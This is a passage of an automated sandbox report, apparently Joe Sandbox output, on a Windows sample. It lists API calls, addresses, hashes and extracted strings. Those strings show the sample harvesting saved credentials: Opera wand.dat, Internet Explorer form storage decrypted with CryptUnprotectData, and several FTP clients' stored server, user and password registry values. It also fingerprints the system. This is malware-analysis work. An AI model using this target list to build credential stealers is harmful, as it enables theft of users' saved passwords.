                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$.ini$Sites\$\*.*
                  • API String ID: 3040542784-999409347
                  • Opcode ID: c47b076886affc71d4b97aea9d9e2028b5f846fbe9e34eebce5f31f813dfcac2
                  • Instruction ID: 014027ab060015c7d8668547a98ec7e6f392db7afa0d1d618ff4209e3bbb5fca
                  • Opcode Fuzzy Hash: c47b076886affc71d4b97aea9d9e2028b5f846fbe9e34eebce5f31f813dfcac2
                  • Instruction Fuzzy Hash: FA3140B0940209AADF20BB61DC41FEA76B8AB84304F1045B7BA09B51F1D7BDDED09E5C

                  Control-flow Graph

                  APIs
                  • GetVersionExA.KERNEL32(0000009C), ref: 00404263
                  • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 004042E8
                  • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404311
                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004043C6
                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004043E5
                  • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004043F5
                  • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404403
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                  • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                  • API String ID: 1787888500-92997708
                  • Opcode ID: cdb3d6fbab9e39f66c7821b3118941f5d0585d140dabf13a675d0ffb5a13bf06
                  • Instruction ID: ce2023bde6a4fb6ecb372171715b32991a17bfc6e2c9532a6d1893fd02629070
                  • Opcode Fuzzy Hash: cdb3d6fbab9e39f66c7821b3118941f5d0585d140dabf13a675d0ffb5a13bf06
                  • Instruction Fuzzy Hash: 76515170A40218BEEF216BA1CC42F9D7A75AF81348F1040BAB749790F1CBB94ED59F59
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0040871C
                  • lstrcmpiA.KERNEL32(00411EA6,?), ref: 0040874F
                  • lstrcmpiA.KERNEL32(00411EA8,?), ref: 00408769
                  • StrStrIA.SHLWAPI(?,opera,00000000,00411EA8,?,00411EA6,?,00000000,?), ref: 004087AE
                  • FindNextFileA.KERNEL32(?,?,00000000,?), ref: 004087DC
                  • FindClose.KERNEL32(?,?,?,00000000,?), ref: 004087EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpi$CloseFirstNext
                  • String ID: \*.*$opera$wand.dat
                  • API String ID: 3663067366-3278183560
                  • Opcode ID: 7aeb2c8a1a2e94ae6af49b6683e94d244e1474266b7b127cdedb6c7c130d2898
                  • Instruction ID: 557ed418c4cd54b267a256c148f0d4b8f8e25ee2e48a42878aee2fa7f092eeb5
                  • Opcode Fuzzy Hash: 7aeb2c8a1a2e94ae6af49b6683e94d244e1474266b7b127cdedb6c7c130d2898
                  • Instruction Fuzzy Hash: AD31507090021DAADF20AB61CD01FEE77B5AB14308F1044BBB548B61A1EBB99FC09F58
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00403E33
                  • lstrcmpiA.KERNEL32(00411EA6,?), ref: 00403E60
                  • lstrcmpiA.KERNEL32(00411EA8,?), ref: 00403E7D
                  • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 00403F47
                  • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 00403F5A
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$\*.*
                  • API String ID: 3040542784-1692270452
                  • Opcode ID: b44ad3ce1885f3e95d41e77a56157922eba595f19b766e5f8d278ed35765075c
                  • Instruction ID: bfff32b9704a049f1e41c3d6a2529012e5f38b11855976b5e9acbc6b14058c4d
                  • Opcode Fuzzy Hash: b44ad3ce1885f3e95d41e77a56157922eba595f19b766e5f8d278ed35765075c
                  • Instruction Fuzzy Hash: 56413E3090020AAADF21AF61CC02FEA7F79AF04305F1045B7B909B51F1D7799B909A99
                  APIs
                  • lstrlenW.KERNEL32(?), ref: 0040A2FE
                  • wsprintfA.USER32 ref: 0040A37D
                  • lstrlenW.KERNEL32(?,?), ref: 0040A3C3
                  • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A406
                  • LocalFree.KERNEL32(00000000), ref: 0040A43D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                  • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • API String ID: 1926481713-2450551051
                  • Opcode ID: e543d0b0b507645461472ba9cc320ac6c87161f1aef8077e7e2bdd713baf0028
                  • Instruction ID: 260137c0291e22f6ba060bb8647dd68ce290b85e1b23a851725c006554f05f3d
                  • Opcode Fuzzy Hash: e543d0b0b507645461472ba9cc320ac6c87161f1aef8077e7e2bdd713baf0028
                  • Instruction Fuzzy Hash: 9C413C72C10218EBDF11AFA0DC06AEDBB79FF08318F14803AF910B51A1D7B99A55DB59
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 00404E6F
                  • lstrcmpiA.KERNEL32(00411EA6,?), ref: 00404E9E
                  • lstrcmpiA.KERNEL32(00411EA8,?), ref: 00404EB8
                  • FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 00404F10
                  • FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 00404F23
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpi$CloseFirstNext
                  • String ID: \*.*
                  • API String ID: 3663067366-1173974218
                  • Opcode ID: 821db13aac8855ccce741e34619079f7ce0c089b5c8ac5f797a5545d8a7e2f9b
                  • Instruction ID: 6a67d0b90606cd11d2a3638aa92bbe6080bb9e2c124e64ba3ab12328cbcb17a4
                  • Opcode Fuzzy Hash: 821db13aac8855ccce741e34619079f7ce0c089b5c8ac5f797a5545d8a7e2f9b
                  • Instruction Fuzzy Hash: 3D31FDB0900219AADF21AB61CC41EEEB7B9AF44304F0045BBBA18B51F1D7799ED19F58
                  APIs
                  • CoCreateInstance.OLE32(004131CB,00000000,00000005,004131DB,?), ref: 0040A46F
                  • StrStrIW.SHLWAPI(00000000,004131FB), ref: 0040A4E6
                  • CoTaskMemFree.OLE32(00000000,00000000,004131FB), ref: 0040A511
                  • CoTaskMemFree.OLE32(00000000,00000000,00000000,004131FB), ref: 0040A51F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeTask$CreateInstance
                  • String ID: ($http://www.facebook.com/
                  • API String ID: 2903366249-3677894361
                  • Opcode ID: b166dd6a5ce2f70902b6da10580f869f0ae24ff8d6d8124b56e15d65d62aef3d
                  • Instruction ID: 432045e52bd66d4fe49fde4f2c870db2b10b178aa535912c656550905345e8ea
                  • Opcode Fuzzy Hash: b166dd6a5ce2f70902b6da10580f869f0ae24ff8d6d8124b56e15d65d62aef3d
                  • Instruction Fuzzy Hash: D831F731A00209FBDF119F90DC49BDEBBB5BF08308F248166E500B6290D7B99AD5DB59
                  APIs
                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00402778
                  • GetCurrentProcess.KERNEL32 ref: 00402782
                  • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 00402790
                  • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 004027D2
                  • CloseHandle.KERNEL32(00000000), ref: 004027E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                  • String ID:
                  • API String ID: 3038321057-0
                  • Opcode ID: 9e21f3fd3e68ce677e23c3b55d49d999316dbdf05d850c254425d8fa8ea8784b
                  • Instruction ID: 8b23b7d22403577f927a3a331623c1ec88f7fce9aa05f6b36c9706ca18c0f2cc
                  • Opcode Fuzzy Hash: 9e21f3fd3e68ce677e23c3b55d49d999316dbdf05d850c254425d8fa8ea8784b
                  • Instruction Fuzzy Hash: 0611213591010AEFEF119B94DD4DBEEBBB5BB04344F108536A111B55E0D7F84A44CB59
                  APIs
                  • OleInitialize.OLE32 ref: 0040FE97
                  • GetUserNameA.ADVAPI32(?,00000101), ref: 0040FEE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitializeNameUser
                  • String ID:
                  • API String ID: 2272643758-0
                  • Opcode ID: bbeb51275df44be299aa57c46db9fa5abcaf4f97a742a1450cd261d66885c8cc
                  • Instruction ID: e26f2e66d9dcda26697d7491d2630af3795e62fece7ce76a808f27638715b85c
                  • Opcode Fuzzy Hash: bbeb51275df44be299aa57c46db9fa5abcaf4f97a742a1450cd261d66885c8cc
                  • Instruction Fuzzy Hash: ECF01C70654201A9CB20BBB2D906ADC39A5AB0038CF10447FB500B19F3EBFD44849A6D
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0040FF45
                  • RevertToSelf.ADVAPI32 ref: 0040FF6B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExceptionFilterRevertSelfUnhandled
                  • String ID:
                  • API String ID: 669012916-0
                  • Opcode ID: 204b044f3cc013be6c6188bff45fc5f4e677cf5a7f2a8a70e96d9e0d528a0934
                  • Instruction ID: 1ef4db78a8eeff073eebb63f225d7f1ff4716855c3f03a9c52e7af2739d389e1
                  • Opcode Fuzzy Hash: 204b044f3cc013be6c6188bff45fc5f4e677cf5a7f2a8a70e96d9e0d528a0934
                  • Instruction Fuzzy Hash: 05D0677418564189E631BBF3945A7CD3A606B0530DF54803FA64060DF3CFBE148DC9AE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !AA
                  • API String ID: 0-779614855
                  • Opcode ID: c2242ef122f4b4731c008e401a651a78bd98daaf91efc53295796e22f2dbc53f
                  • Instruction ID: e439f24111ecda037a6ba224461d6446448cd6da93f758e11ff317597baed0f2
                  • Opcode Fuzzy Hash: c2242ef122f4b4731c008e401a651a78bd98daaf91efc53295796e22f2dbc53f
                  • Instruction Fuzzy Hash: DC118B35604284FFDB225F05DD01B967F65EB81B50F208877F80AA19F2C37E49A69A4D

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00405661
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405691
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004056DF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                  • API String ID: 1332880857-44262141
                  • Opcode ID: bc12ebd6ed49e13805bbd51c7b93d4968f403f2a445392b3feca5043dfa8c3b2
                  • Instruction ID: 6256b6819b4c46cd2bc8a3c44f1df6facdaf933e4f51f1a6b866da70e3a32d03
                  • Opcode Fuzzy Hash: bc12ebd6ed49e13805bbd51c7b93d4968f403f2a445392b3feca5043dfa8c3b2
                  • Instruction Fuzzy Hash: ED21F83568020CBADF116A61CE42FDE7A65AB04B04F20C567B924B50E1DBFD5AE0AF5C

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00401EFB
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401F3B
                  • lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00401FEE
                  • lstrlen.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402027
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 0040205E
                  • GetHGlobalFromStream.OLE32(?,?,?,?), ref: 0040208A
                  • GlobalLock.KERNEL32(?), ref: 004020BA
                  • GlobalUnlock.KERNEL32(?), ref: 004020D9
                  • GetHGlobalFromStream.OLE32(?,?,?,?,?,?), ref: 004020EB
                  • GlobalLock.KERNEL32(?), ref: 0040211B
                  • GlobalUnlock.KERNEL32(?), ref: 0040213A
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
                  • String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                  • API String ID: 4234118056-981893429
                  • Opcode ID: 10c08c6e89e0d03a55878e87c3fa188f42c1e7650d9481c1c75df394e4181a56
                  • Instruction ID: badc67223168fa67c5ee47ab51c24d6e14ff1f2165c540af953b6d676deb288d
                  • Opcode Fuzzy Hash: 10c08c6e89e0d03a55878e87c3fa188f42c1e7650d9481c1c75df394e4181a56
                  • Instruction Fuzzy Hash: 16614B74900168BADB31AB61CD46BEA7679EB04344F0040BBB688B11F1D7FD5EC4AE68

                  Control-flow Graph

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: S-1-5-18
                  • API String ID: 0-4289277601
                  • Opcode ID: 8e3158d1a93bde16ea37971c10a468597ac152d2a6ecb3ea59d04bf08c7c97c6
                  • Instruction ID: 36688ae97771a16eb0cbb91699016dc6f457bd45ac61167d36d0fc4b3f5269ed
                  • Opcode Fuzzy Hash: 8e3158d1a93bde16ea37971c10a468597ac152d2a6ecb3ea59d04bf08c7c97c6
                  • Instruction Fuzzy Hash: C5213D30B00209BEDF219BA5DD8ABEE7BB5AF01748F104476F101B15E1EBB99944DB58

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 004062C2
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004062F6
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406529
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$InitialPath$Login$Password$PasswordType$Port
                  • API String ID: 1332880857-4069465341
                  • Opcode ID: 333cdb783cf6d04b105b3be37216fa7615c6c58f5be93e92b63bab62230026b0
                  • Instruction ID: f54a0b34a13648c7f2de88a23b550de72a796d31f471fcede32365af730f2905
                  • Opcode Fuzzy Hash: 333cdb783cf6d04b105b3be37216fa7615c6c58f5be93e92b63bab62230026b0
                  • Instruction Fuzzy Hash: 1E51D631940118EADF226F51DD41BE9BBB9BF04304F14C0BAB549750B1DBBA5EA1EF88

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040CC67
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040CC9B
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040CEA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
                  • API String ID: 1332880857-2649023343
                  • Opcode ID: 102501fe7d6983fb4ce4816fb803e742d1a2c4c47817e05f00dff8f142c619ea
                  • Instruction ID: 363f7e0d49be60193d8d738e401c9fb1663db730a6c144a8acea58420cec79c7
                  • Opcode Fuzzy Hash: 102501fe7d6983fb4ce4816fb803e742d1a2c4c47817e05f00dff8f142c619ea
                  • Instruction Fuzzy Hash: CE51C371800118FADF226F61CD82BDDBBB9BF04304F10C1BAB558750B1DB7A5A91AF98

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004077AF
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004077E3
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004079F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
                  • API String ID: 1332880857-3874328862
                  • Opcode ID: 4a021aa840e134b11541bbb7fc7602dc1ba3e8ef8cc3bbf4944d3ea423132fef
                  • Instruction ID: 2510d6a40b605ee05c49857dae87127b44a85cf62aaf35441b724d9e07d5eb59
                  • Opcode Fuzzy Hash: 4a021aa840e134b11541bbb7fc7602dc1ba3e8ef8cc3bbf4944d3ea423132fef
                  • Instruction Fuzzy Hash: 5C51D57190411CEADF226F51CD42BDDBBB5BF04304F10C0BAB548750B2DBBA6A91AF89

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D857
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D88B
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DA74
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
                  • API String ID: 1332880857-3620412361
                  • Opcode ID: a32b4bd4c164d7361dc0d4439a1349ca33acaaaa7ec1cf80291e72e22fe995e8
                  • Instruction ID: 90d5fe3b6cf1126b5e6c573dd5c1e4be20dc213f4b7a04e65ac77be63d2f89e1
                  • Opcode Fuzzy Hash: a32b4bd4c164d7361dc0d4439a1349ca33acaaaa7ec1cf80291e72e22fe995e8
                  • Instruction Fuzzy Hash: C4519571940118FBDF226F91CC42BDDBAB5BF04304F10C4BAB549750B1DB7A5AA59F88

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407B01
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407B35
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407CFD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
                  • API String ID: 1332880857-2128033141
                  • Opcode ID: 5acf38d65e4bdc86f7d7c70c30d041cec79a463b2ff235d56f61567fe9a4ba08
                  • Instruction ID: 35a2c5012d915438295930f9c11e6a977943eca2b7189a6a68ac68a7359c4362
                  • Opcode Fuzzy Hash: 5acf38d65e4bdc86f7d7c70c30d041cec79a463b2ff235d56f61567fe9a4ba08
                  • Instruction Fuzzy Hash: 0251953194411CBADF226F51CD42BDDBBB5BF04304F10C0BAB559750B2DBBA5AA1AF88

                  Control-flow Graph

                  APIs
                  • RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 004024CD
                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 004024E6
                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 004024F3
                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040250C
                  • CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 0040252D
                  • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 00402588
                  • CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004025A6
                  • DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004025B5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreate$DeleteDirectoryExitFileHandlePathProcessTempValue
                  • String ID: Software\WinRAR
                  • API String ID: 2428708885-224198155
                  • Opcode ID: b7997a29f9ee12ea2c8683bdef5b38ffdcc73321be99e554f2081b4ec90afc21
